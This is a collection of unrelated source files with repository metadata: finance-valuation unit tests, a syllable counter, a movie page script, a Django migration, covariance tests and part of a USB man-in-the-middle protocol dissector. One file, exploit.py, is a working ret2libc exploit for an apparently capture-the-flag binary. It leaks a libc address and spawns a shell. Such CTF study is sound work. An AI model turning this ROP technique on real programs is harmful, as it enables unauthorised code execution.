self.analyser = EPVanalyser(self.financial_analyst)
def test_AdjustedReturnOnInvestedCapital(self):
adj_ROIC = self.analyser.owner_earnings() / self.financial_analyst.investedCapital()
trend_ROIC = self.financial_analyst.series_trend(adj_ROIC)
mean_rtn = trend_ROIC["2015"]
expected_std = (adj_ROIC - trend_ROIC).std()
expected_mean = mean_rtn - 1.65 * (expected_std / (5.0 ** 0.5))
adj_ROIC_mean = self.analyser.ROIC_mean()
adj_ROIC_std = self.analyser.ROIC_std()
self.assertEqual(adj_ROIC_std, expected_std)
self.assertEqual(adj_ROIC_mean, expected_mean)
def test_OptimalF(self):
min_denom = 0.01
adj_frac = 1.0 / 6.0
mean = self.analyser.ROIC_mean()
std = self.analyser.ROIC_std()
expectedF = adj_frac * mean / max(std ** 2 - mean ** 2, min_denom)
self.assertEqual(self.analyser.optF(), expectedF)
def test_OptimalFwithNegReturn(self):
min_denom = 0.01
adj_frac = 1.0 / 6.0
min_F = 0.001
self.analyser.ROIC_mean = Mock(return_value = -0.25)
mean = self.analyser.ROIC_mean()
std = self.analyser.ROIC_std()
expectedF = max(adj_frac * mean / max(std ** 2 - mean ** 2, min_denom), min_F)
self.assertEqual(self.analyser.optF(), expectedF)
def test_ActualF(self):
current_debt = self.debt["2015"]
current_free_cash = self.free_cash["2015"]
net_debt = current_debt - current_free_cash
current_assets = self.assets["2015"]
expectedF = current_assets / (current_assets - net_debt)
self.assertEqual(self.analyser.actF(), expectedF)
def test_WACCbaseline(self):
debt_cost = 0.09
equity_cost = 0.20
self.analyser.debt_cost = debt_cost
self.analyser.equity_premium = 0.11
self.analyser.equity_base_cost = 0.09
f_opt = 3.5
self.analyser.optF = Mock(return_value = f_opt)
self.assertEqual(self.analyser.WACC(equity_cost), equity_cost * (1 / f_opt) + debt_cost * ((f_opt - 1) / f_opt))
def test_ProbabilityOfLoss(self):
acceptable_DD = 0.25
self.analyser.acceptable_DD = acceptable_DD
mean_rtn = 0.212
std_rtn = 0.159
self.analyser.ROIC_mean = Mock(return_value = mean_rtn)
self.analyser.ROIC_std = Mock(return_value = std_rtn)
optF = 3.5
expected_prob = math.exp((-2.0 * optF * mean_rtn * acceptable_DD) / (optF * std_rtn) ** 2)
self.assertEqual(self.analyser.loss_probability(optF), expected_prob)
def test_LeveragedEquityCost(self):
prob_at_opt = 0.301
prob_at_act = 0.016
loss_prob_mock = Mock()
loss_prob_mock.side_effect = [prob_at_opt, prob_at_act]
self.analyser.loss_probability = loss_prob_mock
leverage_ratio = prob_at_act / prob_at_opt
equity_base_cost = 0.09
equity_premium = 0.11
self.analyser.equity_premium = equity_premium
self.analyser.equity_base_cost = equity_base_cost
expected_cost = equity_base_cost + leverage_ratio * equity_premium
equity_cost = self.analyser.equity_cost()
self.assertEqual(equity_cost, expected_cost)
self.assertAlmostEqual(equity_cost, 0.096, places = 3)
class Test_GrowthMultiple(unittest.TestCase):
def setUp(self):
years = ["2015", "2014", "2013", "2012", "2011"]
self.income = Mock()
self.balance = Mock()
self.cash = Mock()
self.financial_analyst = FinanceAnalyst(self.income, self.balance, self.cash)
self.analyser = EPVanalyser(self.financial_analyst)
self.adjusted_earnings = pandas.Series([11150.46, 7893.12, 5666.38, 12404.10, 19816.02], index = years)
self.invested_capital = pandas.Series([41642.4, 50073.4, 49105.9, 32548.6, 34948.5], index = years)
self.financial_analyst.ownerEarnings = Mock(return_value = self.adjusted_earnings)
self.financial_analyst.investedCapital = Mock(return_value = self.invested_capital)
def test_GrowthMultiple(self):
WACC = 0.093
R = 0.212 # mean return
I = 0.026 # cash investment percentage
expected = (1 - (I / WACC)*(WACC / R)) / (1 - (I / WACC))
growth_mult = self.analyser.growth_multiple(WACC, I, R)
self.assertEqual(growth_mult, expected)
self.assertAlmostEqual(growth_mult, 1.218, places = 3)
def test_GrowthMultipleCap(self):
WACC = 0.10
R = 0.15
I = 0.14
expected = (1 - 0.75 * WACC / R) / (1 - 0.75)
growth_mult = self.analyser.growth_multiple(WACC, I, R)
self.assertAlmostEqual(growth_mult, 2.000, places = 3)
def test_GrowthMultipleNegRtn(self):
WACC = 0.25
R = -0.025
I = 0.05
expected = (1 - (I / WACC) * abs(WACC / R)) / (1 - (I / WACC))
growth_mult = self.analyser.growth_multiple(WACC, I, R)
self.assertAlmostEqual(growth_mult, -1.250, places = 3)
class Test_AdjustmentForCyclicality(unittest.TestCase):
def setUp(self):
years = ["2015", "2014", "2013", "2012", "2011"]
self.income = Mock()
self.balance = Mock()
self.cash = Mock()
self.income.sales = pandas.Series([216892.6, 114182.9, 114695.4, 152837.9, 142511.6], index = years)
self.income.COGS = pandas.Series([193088.80, 94391.70, 96937.40, 128595.40, 106295.80], index = years)
self.income.SGA = pandas.Series([8135.10, 7170.40, 7966.20, 6447.00, 8320.20], index = years)
self.income.DandA = pandas.Series([4169.4, 1639.2, 974.8, 685.7, 542.4], index = years)
self.financial_analyst = FinanceAnalyst(self.income, self.balance, self.cash)
self.analyser = EPVanalyser(self.financial_analyst)
self.adjusted_earnings = pandas.Series([11150.46, 7893.12, 5666.38, 12404.10, 19816.02], index = years)
self.maintenance_capex = pandas.Series([2287.83, 1973.08, 1658.33, 1343.58, 1028.83], index = years)
self.invested_capital = pandas.Series([41642.39, 50073.44, 49105.93, 32548.57, 34948.47], index = years)
self.adjusted_ROIC_mean = 0.196
self.financial_analyst.ownerEarnings = Mock(return_value = self.adjusted_earnings)
self.financial_analyst.expended_depreciation = Mock(return_value = self.maintenance_capex)
self.financial_analyst.investedCapital = Mock(return_value = self.invested_capital)
self.analyser.ROIC_mean = Mock(return_value = self.adjusted_ROIC_mean)
def test_TrendEarnings(self):
expected = self.financial_analyst.series_trend(self.adjusted_earnings)
trend_earnings = self.financial_analyst.trendEarnings()
self.assertTrue(trend_earnings.equals(expected))
def test_EarningsOnROIC(self):
expected = self.invested_capital * self.adjusted_ROIC_mean
adj_earnings = self.analyser.ROIC_adjusted_earnings()
self.assertTrue(adj_earnings.equals(expected))
class Test_EPVcalcs(unittest.TestCase):
def setUp(self):
years = ["2015", "2014", "2013", "2012", "2011"]
self.income = Mock()
self.balance = Mock()
self.cash = Mock()
self.financial_analyst = FinanceAnalyst(self.income, self.balance, self.cash)
self.analyser = EPVanalyser(self.financial_analyst)
self.adjusted_earnings = pandas.Series([8143.91, 9792.75, 6378.77, 6365.45, 6834.80], index = years)
self.trend_earnings = pandas.Series([75010.89, 61676.55, 48342.21, 35007.87, 21673.53], index = years)
self.net_cash = pandas.Series([61329.61, 31829.56, 14498.27, 31568.63, 33876.43], index = years)
self.debt = pandas.Series([1104.3, 535.4, 908.3, 479.0, 928.5], index = years)
self.num_shares_diluted = pandas.Series([153646.0, 152881.0, 151569.0, 150000.0, 125932.0], index = years)
self.financial_analyst.ownerEarnings = Mock(return_value = self.adjusted_earnings)
self.financial_analyst.trendEarnings = Mock(return_value = self.trend_earnings)
self.financial_analyst.netCash = Mock(return_value = self.net_cash)
self.financial_analyst.totalDebt = Mock(return_value = self.debt)
self.financial_analyst.numSharesDiluted = Mock(return_value = self.num_shares_diluted)
def test_EPVcalculation(self):
earnings = self.adjusted_earnings
WACC = 0.0945
growth = 1.057
dilution = 0.9462
expected = ((earnings / WACC) * growth - self.debt + self.net_cash) * dilution
EPV = self.analyser.EPV(earnings, WACC, growth, dilution)
self.assertTrue(EPV.equals(expected))
self.assertAlmostEqual(EPV["2015"], 143175.63, places = 2)
def test_EPVcalculationBase(self):
earnings = self.adjusted_earnings
WACC = 0.0945
expected = (earnings / WACC) - self.debt + self.net_cash
EPV = self.analyser.EPV(earnings, WACC, 1, 1)
self.assertTrue(EPV.equals(expected))
self.assertAlmostEqual(EPV["2015"], 146404.25, places = 2)
def test_EPVcalculationTable(self):
earnings = pandas.DataFrame({"Base" : self.adjusted_earnings,
"Other" : self.adjusted_earnings})
WACC = 0.0945
expected = (earnings / WACC).sub(self.debt, axis = "index").add(self.net_cash, axis = "index")
EPV = self.analyser.EPV(earnings, WACC, 1, 1)
self.assertTrue(EPV.equals(expected))
self.assertAlmostEqual(EPV["Base"]["2015"], 146404.25, places = 2)
def test_EPVperShare(self):
earnings = self.adjusted_earnings
WACC = 0.0945
EPV = self.analyser.EPV(earnings, WACC, 1, 1)
expected = EPV / self.num_shares_diluted
EPV_share = self.analyser.per_share(EPV)
self.assertTrue(EPV_share.equals(expected))
self.assertAlmostEqual(EPV_share["2015"], 0.953, places = 3)
def test_EPVperShareTable(self):
earnings = pandas.DataFrame({"Base" : self.adjusted_earnings,
"Other" : self.adjusted_earnings})
WACC = 0.0945
EPV = self.analyser.EPV(earnings, WACC, 1, 1)
expected = EPV.div(self.num_shares_diluted, axis = "index")
EPV_share = self.analyser.per_share(EPV)
self.assertTrue(EPV_share.equals(expected))
self.assertAlmostEqual(EPV_share["Base"]["2015"], 0.953, places = 3)
class Test_EPVvariations(unittest.TestCase):
def setUp(self):
self.earnings = "adjusted_earnings"
self.trend = "trend_earnings"
self.ROIC_earnings = "ROIC_earnings"
self.min_earnings = "min_earnings"
self.max_earnings = "max_earnings"
self.earnings_table = Mock()
self.earnings_table.min = Mock(return_value = self.min_earnings)
self.earnings_table.max = Mock(return_value = self.max_earnings)
return_series = pandas.Series([0] * 3)
self.growth = 2.0
self.dilution = 1 - 0.05
self.WACC = 0.12
self.WACC_base = 0.18
self.analyser = EPVanalyser(Mock())
self.analyser.owner_earnings = Mock(return_value = self.earnings)
self.analyser.trend_earnings = Mock(return_value = self.trend)
self.analyser.ROIC_adjusted_earnings = Mock(return_value = self.ROIC_earnings)
self.analyser.earnings_table = Mock(return_value = self.earnings_table)
self.analyser.EPV = Mock(return_value = return_series)
self.analyser.WACC = Mock(return_value = self.WACC)
self.analyser.WACC_base = Mock(return_value = self.WACC_base)
self.analyser.dilution = Mock(return_value = self.dilution)
self.analyser.growth_multiple = Mock(return_value = self.growth)
def test_EPVbase(self):
EPV = self.analyser.EPV_base()
self.analyser.EPV.assert_called_once_with(self.earnings, self.WACC_base, growth = 1, dilution = 1)
def test_EPVlevered(self):
EPV = self.analyser.EPV_levered()
self.analyser.EPV.assert_called_once_with(self.earnings, self.WACC, growth = 1, dilution = 1)
def test_EPVgrowth(self):
EPV = self.analyser.EPV_growth()
self.analyser.EPV.assert_called_once_with(self.earnings, self.WACC_base, growth = self.growth, dilution = 1)
def test_EPVcyclic(self):
EPV = self.analyser.EPV_cyclic()
self.analyser.EPV.assert_called_once_with(self.ROIC_earnings, self.WACC_base, growth = 1, dilution = 1)
def test_EPVdiluted(self):
EPV = self.analyser.EPV_diluted()
self.analyser.EPV.assert_called_once_with(self.earnings, self.WACC_base, growth = 1, dilution = self.dilution)
def test_EPVadjusted(self):
EPV = self.analyser.EPV_adjusted()
self.analyser.EPV.assert_called_once_with(self.earnings, self.WACC, growth = self.growth, dilution = self.dilution)
def test_EPVmin(self):
EPV = self.analyser.EPV_minimum()
self.analyser.EPV.assert_called_once_with(self.min_earnings, self.WACC_base, 1, self.dilution)
def test_EPVmax(self):
EPV = self.analyser.EPV_maximum()
self.analyser.EPV.assert_called_once_with(self.max_earnings, self.WACC, self.growth, 1)
if __name__ == '__main__':
unittest.main()
| [
"markhocky@gmail.com"
] | markhocky@gmail.com |
421a3548c2d98a5e84c8119092e85a215117d19c | 64e9565bd7ca0cab875f2549fa40781061926568 | /source/countsyl.py | 781f8c24c4fca600e4dbfe0186df22cf3ebde5d8 | [] | no_license | carlyrobison/sonnetspoofer | 9dcf0a5d1193fe6623ab80c61f2b2adae2d7889f | 3b18004b9e5c6c679cb49664500b1fb878c0484d | refs/heads/master | 2021-01-20T03:17:30.783296 | 2017-02-28T01:55:56 | 2017-02-28T01:55:56 | 82,864,167 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,908 | py | # From https://github.com/hyperreality/Poetry-Tools/blob/master/poetrytools/countsyl.py
#!//usr/bin/env python
# Count syllables in a word.
#
# Doesn't use any fancy knowledge, just a few super simple rules:
# a vowel starts each syllable;
# a doubled vowel doesn't add an extra syllable;
# two or more different vowels together are a diphthong,
# and probably don't start a new syllable but might;
# y is considered a vowel when it follows a consonant.
#
# Even with these simple rules, it gets results far better
# than python-hyphenate with the libreoffice hyphenation dictionary.
#
# Copyright 2013 by Akkana Peck http://shallowsky.com.
# Share and enjoy under the terms of the GPLv2 or later.
import sys
verbose = False
def count_syllables(word):
vowels = ['a', 'e', 'i', 'o', 'u']
on_vowel = False
in_diphthong = False
minsyl = 0
maxsyl = 0
lastchar = None
word = word.lower()
for c in word:
is_vowel = c in vowels
if on_vowel == None:
on_vowel = is_vowel
# y is a special case
if c == 'y':
is_vowel = not on_vowel
if is_vowel:
if not on_vowel:
# We weren't on a vowel before.
# Seeing a new vowel bumps the syllable count.
minsyl += 1
maxsyl += 1
elif on_vowel and not in_diphthong and c != lastchar:
# We were already in a vowel.
# Don't increment anything except the max count,
# and only do that once per diphthong.
in_diphthong = True
maxsyl += 1
on_vowel = is_vowel
lastchar = c
# Some special cases:
if word[-1] == 'e':
minsyl -= 1
# if it ended with a consonant followed by y, count that as a syllable.
if word[-1] == 'y' and not on_vowel:
maxsyl += 1
return minsyl | [
"sharikak54@gmail.com"
] | sharikak54@gmail.com |
da63497011d0f31d066f5ff77a5e4f79c6dbbdb3 | 5b2ab5cda3d807ead96c69b126efd2574d287f95 | /entertainment_center.py | c18e181aebf8dcd68459131ebca7ca6f2ab01d0b | [
"MIT"
] | permissive | egpaul/fresh-tomatoes | 95fa771576722b075c624b6460e0bf6f98486f77 | 9bd0e024e31fed3e3de9d3f0ff0420e9d89985a4 | refs/heads/master | 2021-05-15T10:44:36.190250 | 2017-10-25T16:33:58 | 2017-10-25T16:33:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,796 | py | import fresh_tomatoes
import media
# Goodfellas Movie: Movie title, storyline, poster image, and trailer
goodfellas = media.Movie(
"Goodfellas",
"A young man grows up in the mob and works very hard to advance himself"
"through the ranks",
"https://s-media-cache-ak0.pinimg.com/originals/17/34/15/173415b43512c20f4ec490909b81a82c.jpg", # NOQA
"https://youtu.be/qWhS8Pjf-9c"
)
# Casino Movie: Movie title, storyline, poster image, and trailer
casino = media.Movie(
"Casino",
"In early-1970s Las Vegas, low-level mobster Sam Ace Rothstein (Robert De"
"Niro) gets tapped by his bosses to head the Tangiers Casino. ",
"http://www.impawards.com/1995/posters/casino_ver1.jpg",
"https://youtu.be/EGNx3ilNB80"
)
# A Bronx Tale Movie: Movie title, storyline, poster image, and trailer
a_bronx_tale = media.Movie(
"A Bronx Tale",
"As he grows into a teenager on the streets of the Bronx in the socially"
"turbulent 1960s, Calogero (Lillo Brancato) gets taken under the wing of"
"neighborhood mobster Sonny (Chazz Palminteri).",
"http://is1.mzstatic.com/image/thumb/Video52/v4/7c/ed/9b/7ced9bfb-50f7-ca84-2757-3d53adf48d1e/source/1200x630bb.jpg", # NOQA
"https://youtu.be/iPaMz7DkGdw"
)
# Donnie Brasco Movie: Movie title, storyline, poster image, and trailer
donnie_brasco = media.Movie(
"Donnie Brasco",
"Joseph Pistone (Johnny Depp) is an FBI agent who has infiltrated one of"
"the major New York Mafia families and is living under the name Donnie"
"Brasco.",
"https://s-media-cache-ak0.pinimg.com/originals/7f/99/8d/7f998df079fc950a9779ca23ff9b5836.jpg", # NOQA
"https://youtu.be/-LxfpyZXJiI"
)
# The Godfather: Movie title, storyline, poster image, and trailer
the_godfather = media.Movie(
"The Godfather",
"The aging patriarch of an organized crime dynasty transfers control of"
"his clandestine",
"http://static.metacritic.com/images/products/movies/3/47c2b1f35087fc23c5ce261bbc3ad9e0.jpg", # NOQA
"https://youtu.be/8V2k2YQEQJ4"
)
# The Departed: Movie title, storyline, poster image, and trailer
the_departed = media.Movie(
"The Departed",
"An undercover cop and a mole in the police attempt to identify each"
"other.",
"http://static.rogerebert.com/uploads/movie/movie_poster/the-departed-2007/large_tGLO9zw5ZtCeyyEWgbYGgsFxC6i.jpg", # NOQA
"https://youtu.be/SGWvwjZ0eDc")
# The Departed: Movie title, storyline, poster image, and trailer
# Sets the movies to be passed to the media file
movies = [
goodfellas,
casino,
a_bronx_tale,
donnie_brasco,
the_godfather,
the_departed
]
# Opens the HTML file in a webbrowser
fresh_tomatoes.open_movies_page(movies)
# print (media.Movie.VALID_RATINGS)
# print(media.Movie.__doc__)
| [
"noreply@github.com"
] | noreply@github.com |
5493043be3c35aaaa1701498e246f4f8555ae5d7 | 8b2aeac35b73d03587251311fcd171e72a8fc854 | /photos/migrations/0002_auto_20180128_1207.py | 4b21b603c9fe41632188a38fc2948d97f3dcf7af | [] | no_license | mansonul/wedding | 78e273cf68b5897136c0b8ef18c664c3cfa505e2 | 3168faa79f1c223eb078e0e1941a2ddfeab903c4 | refs/heads/master | 2021-05-10T18:16:13.795886 | 2018-01-29T18:13:41 | 2018-01-29T18:13:41 | 118,626,784 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 573 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-01-28 12:07
from __future__ import unicode_literals
from django.db import migrations
import imagekit.models.fields
import photos.models
class Migration(migrations.Migration):
dependencies = [
('photos', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='photoupload',
name='image',
field=imagekit.models.fields.ProcessedImageField(blank=True, null=True, upload_to=photos.models.PhotoUpload.path_and_rename),
),
]
| [
"contact@dragosnicu.com"
] | contact@dragosnicu.com |
420ed41a7c05d90d86eec59a10c4788fd7143316 | 6fcd81ee329e404b8bcda2173092506663c3de93 | /Randompresent/exploit.py | 569112881b7dff1946f51dc33c8e993bf054bb00 | [] | no_license | not-duckie/RandomPwn | efe2aed9041bcd320cc75b14933aa508635e73a5 | e9a85b94239abf8ab49d03108a5c7a893d42bc3b | refs/heads/master | 2023-03-26T07:39:54.650384 | 2021-03-21T07:32:44 | 2021-03-21T07:32:44 | 195,807,065 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 655 | py | #!/usr/bin/env python
from pwn import *
bin = ELF('./randompresent')
libc = ELF('./libc.so.6')
p = process('./randompresent')
#Stage 1 leaking
padding = "A"*40
put_plt = p64(bin.plt['puts'])
put_got = p64(bin.got['puts'])
pop_rdi = p64(0x0040077b)
main = p64(0x400676)
payload = padding + pop_rdi + put_got + put_plt + main
p.recvuntil('ROP me!')
p.sendline(payload)
p.recvline()
leak = u64(p.recvline().strip().ljust(8,'\x00'))
lba = leak - libc.symbols['puts']
#Stage 2 exploitation
system = p64(lba + 0x449c0)
bin_sh = p64(lba + 0x181519)
payload = padding + pop_rdi + bin_sh + system
p.recvuntil('ROP me!')
p.sendline(payload)
p.interactive()
| [
"noreply@github.com"
] | noreply@github.com |
7b485e6c81c4efd3aac47646b1b61652249aa27d | f9b5a01d8cfeddc0c52fcbfc593fa0f31c4df1bf | /ex06/ex06.py | 6367fad5aff079d421fae75ad052baafeb043335 | [] | no_license | wogurdlek2/16PFA-2013211032 | 358154af14f65b7fd635dd9a682dd9ea22d7539e | 478616b3a090c596afba1b62f01152d468e0f014 | refs/heads/master | 2021-01-21T12:59:29.942224 | 2016-05-25T11:31:16 | 2016-05-25T11:31:16 | 53,999,917 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | x = "There are %d types of prople." % 10
binary = "binary"
do_not = "don't"
y = "Those who know %s and those who %s." % (binary, do_not)
print x
print y
print "I sais: %r." % x
print "I also said: '%s'." % y
hilarious = False
joke_evaluation = "Isn't that joke so funny?! %r"
print joke_evaluation % hilarious
w = "This is the left side of..."
e = "a string with a right side."
print w + e
| [
"CAD Client"
] | CAD Client |
bb42ad482fbb2350569ef7809947d727ac99b2f2 | 9ecfba7ed75b2869b09ec3e79c1f45dab21b9640 | /others/cropimage.py | 2583ee07c70b7822aad8ceca2237d18e83ee22a9 | [
"MIT"
] | permissive | pection/Scraper-website | ca7af593e421d4f09bfc280d6ec24e6562e0f6c3 | 77ed1df5103e1d8222a055c19acf5af255ffa4aa | refs/heads/master | 2022-12-25T15:51:46.958483 | 2020-10-07T13:58:40 | 2020-10-07T13:58:40 | 315,717,273 | 1 | 0 | MIT | 2020-11-24T18:18:42 | 2020-11-24T18:18:41 | null | UTF-8 | Python | false | false | 817 | py | import cv2
import os
import sys
import numpy as np
from PIL import Image
num=1
path ="//Users/pection/Documents/Crop/"
#we shall store all the file names in this list
filelist=[]
for root, dirs, files in os.walk(path):
for file in files:
if(file.endswith(".png")):
filelist.append(os.path.join(root,file))
print (filelist)
# logo=Image.open('logo.png')
# logo2=Image.open('logo2.png')
# watermark = Image.open('WatermarkB5.png')
# watermark2 = Image.open('WatermarkB3.png')
#
# logoWidth = watermark.width
# logoHeight = watermark.height
# watermarkW=watermark.width
# watermarkH=watermark.height
# logo2Width = watermark2.width
# logo2Height = watermark2.height
for filename in filelist:
img = cv2.imread(filename,-1)
crop_img = img[40:450, 40:450]
cv2.imwrite(filename,crop_img)
| [
"pection.naphat@gmail.com"
] | pection.naphat@gmail.com |
36f451d7368c519828e012b9099415a08a28f862 | 21f05b45dbb43667007f3063d1a33082e122bec6 | /src/NIMSU_Modules/Test/Test_SampFormCovariance.py | 120d527539a69407c1ca020478af5c1b8c85254a | [] | no_license | DanAyres/NIMSU | 6f328f4b98a5eb34277be347fa1a2bb331bd87f0 | 6fe378c73d25aa58951de75d50841864268d389b | refs/heads/master | 2020-05-02T11:18:06.087070 | 2015-05-27T09:27:17 | 2015-05-27T09:27:17 | 34,388,261 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,882 | py | '''
Created on 9 Feb 2015
@author: daniel
'''
import unittest
import numpy as np
from NIMSU_Modules.SampFormCovariance import Exponential_kernel, Calculate_Covariance_Matrix, Form_Covariance_Matrix, PosDef
from StringIO import StringIO
#import sys
class TestFormCovariance(unittest.TestCase):
def testExpoKernel(self):
N=3
l=0.1
a=np.zeros([N,N], float)
for i in range(N):
for j in range(i+1):
a[i,j] = np.exp( -np.fabs(i-j)/l )
if j!=i: a[j,i] = a[i,j]
b=Exponential_kernel(N, l)
self.assertTrue(np.allclose(a,b, rtol=1e-05, atol=1e-08))
def testCalcCov(self):
N=3
a=np.ones([N,N], float)
Sigma=np.zeros(N,float)
for i in range(N):
Sigma[i] = i+1
b=Calculate_Covariance_Matrix(a, Sigma, N)
for i in range(N):
for j in range(N):
a[i,j] = (i+1)*(j+1)
self.assertTrue(np.allclose(a,b, rtol=1e-05, atol=1e-08))
def testPosDef(self):
output=StringIO()
N=3
Sigma=np.zeros(N,float)
for i in range(N):
Sigma[i] = i+1
# Test reconstruction of covariance
kernel_args=0.1
Corr_Matrix=Exponential_kernel(N, kernel_args)
Covariance_Matrix=Calculate_Covariance_Matrix(Corr_Matrix, Sigma, N)
test_Matrix,flag=PosDef(Covariance_Matrix, N, output)
self.assertTrue(np.allclose(Covariance_Matrix, test_Matrix, rtol=1e-05, atol=1e-08))
self.assertEqual(flag, False, "POSDEF negative eigenvalues")
# Test catch negative eigenvalues
N=2
Covariance_Matrix=np.zeros([N,N],float)
Covariance_Matrix[0,0] = 1;Covariance_Matrix[1,1]=1
Covariance_Matrix[0,1] = 2;Covariance_Matrix[1,0]=2
test_Matrix1,flag=PosDef(Covariance_Matrix, N, output)
test_Matrix=np.ones([N,N], float)
test_Matrix *=1.5
self.assertTrue(np.allclose(test_Matrix, test_Matrix1, rtol=1e-05, atol=1e-08))
self.assertEqual(flag, True, "POSDEF NO negative eigenvalues")
def testFormCovMat(self):
output=StringIO()
# depend==no
N=3
Corr_Matrix=np.zeros([N,N], float)
test_Matrix=np.zeros([N,N], float)
Sigma=np.zeros(N,float)
for i in range(N):
Sigma[i] = i+1
depend='no'
kernel='exponential'
kernel_args=0.1
Covariance_Matrix=Form_Covariance_Matrix(Corr_Matrix, Sigma, N, depend, kernel, kernel_args, output)
for i in range(N):
test_Matrix[i,i] = Sigma[i]**2
self.assertTrue(np.allclose(Covariance_Matrix, test_Matrix, rtol=1e-05, atol=1e-08))
# depend==yes
depend='yes'
Covariance_Matrix=Form_Covariance_Matrix(Corr_Matrix, Sigma, N, depend, kernel, kernel_args, output)
self.assertTrue(np.allclose(Covariance_Matrix[:,0], Sigma**2, rtol=1e-05, atol=1e-08))
# Test bad kernel
Corr_Matrix=None
depend='corr'
kernel='dave'
self.assertRaises(ValueError, Form_Covariance_Matrix, Corr_Matrix, Sigma, N, depend, kernel, kernel_args, output)
# Test expo kernel
test_Matrix = Exponential_kernel(N, kernel_args)
for i in range(N):
for j in range(N):
test_Matrix[i,j] *= Sigma[i]*Sigma[j]
kernel='exponential'
Covariance_Matrix=Form_Covariance_Matrix(Corr_Matrix, Sigma, N, depend, kernel, kernel_args, output)
self.assertTrue(np.allclose(Covariance_Matrix, test_Matrix, rtol=1e-05, atol=1e-08))
| [
"daiel@daiel-XPS-L421X"
] | daiel@daiel-XPS-L421X |
ffac71f012dd66130a8b66b3c02ceaca9515efd0 | ee8109057287ca39a83258e0b7be3bc2430f5dd3 | /usbq/usbq/usbmitm_proto.py | 66037a50f2167693ca16dea0b4195a4c90e02692 | [
"MIT"
] | permissive | bm16ton/usbq-usbq_core | 3153b7c049b6da0743ccbc51e28a1b461d99b2fb | c289f108fcf4f16ff72540d3301b432d830dfaa8 | refs/heads/master | 2023-08-15T20:08:22.558962 | 2021-10-22T03:29:51 | 2021-10-22T03:29:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,450 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from scapy.fields import ConditionalField
from scapy.fields import EnumField
from scapy.fields import LEIntField
from scapy.fields import LEShortField
from scapy.fields import LESignedIntField
from scapy.fields import PacketField
from scapy.fields import StrField
from scapy.fields import struct
from scapy.packet import Packet
from .defs import AutoDescEnum
from .defs import USBDefs
from .dissect.fields import TypePacketField
from .dissect.usb import ConfigurationDescriptor
from .dissect.usb import Descriptor
from .dissect.usb import DeviceDescriptor
from .dissect.usb import GetDescriptor
from .dissect.usb import URB
__all__ = [
'USBMessageHost',
'USBMessageDevice',
'ManagementMessage',
'ManagementReset',
'ManagementNewDevice',
'ManagementReload',
'USBMessageRequest',
'USBMessageResponse',
'USBAck',
]
class USBMitm(Packet):
def desc(self):
return '%r' % (self,)
class MitmType(AutoDescEnum):
'USBQ Protocol Packet Type'
# ubq_core/msg.h
USB = 0
ACK = 1
MANAGEMENT = 2
class ManagementType(AutoDescEnum):
'USBQ Management Packet Type'
# ubq_core/msg.h
RESET = 0
NEW_DEVICE = 1
RELOAD = 2
class USBSpeed(AutoDescEnum):
'USBQ Device Speed'
# kernel linux/usb/ch9.h
LOW_SPEED = 1
FULL_SPEED = 2
HIGH_SPEED = 3
class URBEPDirection(AutoDescEnum):
'''
URB EP direction
From the Linux kernel's perspective the direction of the
endpoint.
'''
# ubq_core/types.h
URB_IN = 0
URB_OUT = 1
class USBEp(USBMitm):
fields_desc = [
LEShortField('epnum', 0),
EnumField(
'eptype', USBDefs.EP.TransferType.CTRL, USBDefs.EP.TransferType.desc, '<I'
),
EnumField('epdir', USBDefs.EP.Direction.IN, USBDefs.EP.Direction.desc, '<I'),
]
def extract_padding(self, s):
return '', s
def is_ctrl_0(self):
return self.epnum == 0 and self.eptype == USBDefs.EP.TransferType.CTRL
def is_interrupt(self):
return self.eptype == USBDefs.EP.TransferType.INT
class USBAck(USBMitm):
fields_desc = [
PacketField('ep', USBEp(), USBEp),
LESignedIntField('status', 0),
StrField('data', ''),
]
def desc(self):
return 'ACK %r' % (self.status,)
class USBMessageRequest(USBMitm):
fields_desc = [
PacketField('ep', USBEp(), USBEp),
ConditionalField(
PacketField('request', GetDescriptor(), URB), lambda p: p.ep.is_ctrl_0()
),
StrField('data', ''),
]
def get_usb_payload(self):
if self.ep.is_ctrl_0():
return self.request
return self.data
def desc(self):
s = []
if self.ep.is_ctrl_0():
s.append(self.request.desc())
if len(self.data) > 0:
s.append('+data (len:%u)' % (len(self.data)))
return ' '.join(s)
class USBMessageResponse(USBMitm):
fields_desc = [
PacketField('ep', USBEp(), USBEp),
ConditionalField(
PacketField('request', GetDescriptor(), URB), lambda p: p.ep.is_ctrl_0()
),
ConditionalField(
PacketField('response', DeviceDescriptor(), Descriptor),
lambda p: p.ep.is_ctrl_0() and type(p.request) is GetDescriptor,
),
StrField('data', ''),
]
def get_usb_payload(self):
if self.ep.is_ctrl_0() and type(self.request) is GetDescriptor:
return self.response
return self.data
def desc(self):
s = []
if self.ep.is_ctrl_0() and type(self.request) is GetDescriptor:
return self.response.desc()
if len(self.data) > 0:
s.append('+data (len:%u)' % (len(self.data)))
return ' '.join(s)
class ManagementNewDevice(USBMitm):
fields_desc = [
EnumField('speed', USBMitm.USBSpeed.HIGH_SPEED, USBMitm.USBSpeed.desc, '<I'),
PacketField('device', DeviceDescriptor(), DeviceDescriptor),
PacketField(
'configuration', ConfigurationDescriptor(), ConfigurationDescriptor
),
]
def desc(self):
return 'NewDevice'
class ManagementReset(USBMitm):
def desc(self):
return 'Reset'
class ManagementReload(USBMitm):
def desc(self):
return 'Reload'
class ManagementMessage(USBMitm):
'USBQ management message'
fields_desc = [
EnumField(
'management_type',
USBMitm.ManagementType.RESET,
USBMitm.ManagementType.desc,
'<I',
),
TypePacketField(
'management_content',
ManagementReset(),
'management_type',
{
USBMitm.ManagementType.RESET: ManagementReset,
USBMitm.ManagementType.NEW_DEVICE: ManagementNewDevice,
USBMitm.ManagementType.RELOAD: ManagementReload,
},
),
] # FIXME: ManagementReset is empty, so if there is nothing to dissect, management_content will be the default value
def post_build(self, p, pay):
if self.management_type is None:
if isinstance(self.management_content, ManagementNewDevice):
p = struct.pack('<H', USBMitm.ManagementType.NEW_DEVICE) + p[2:]
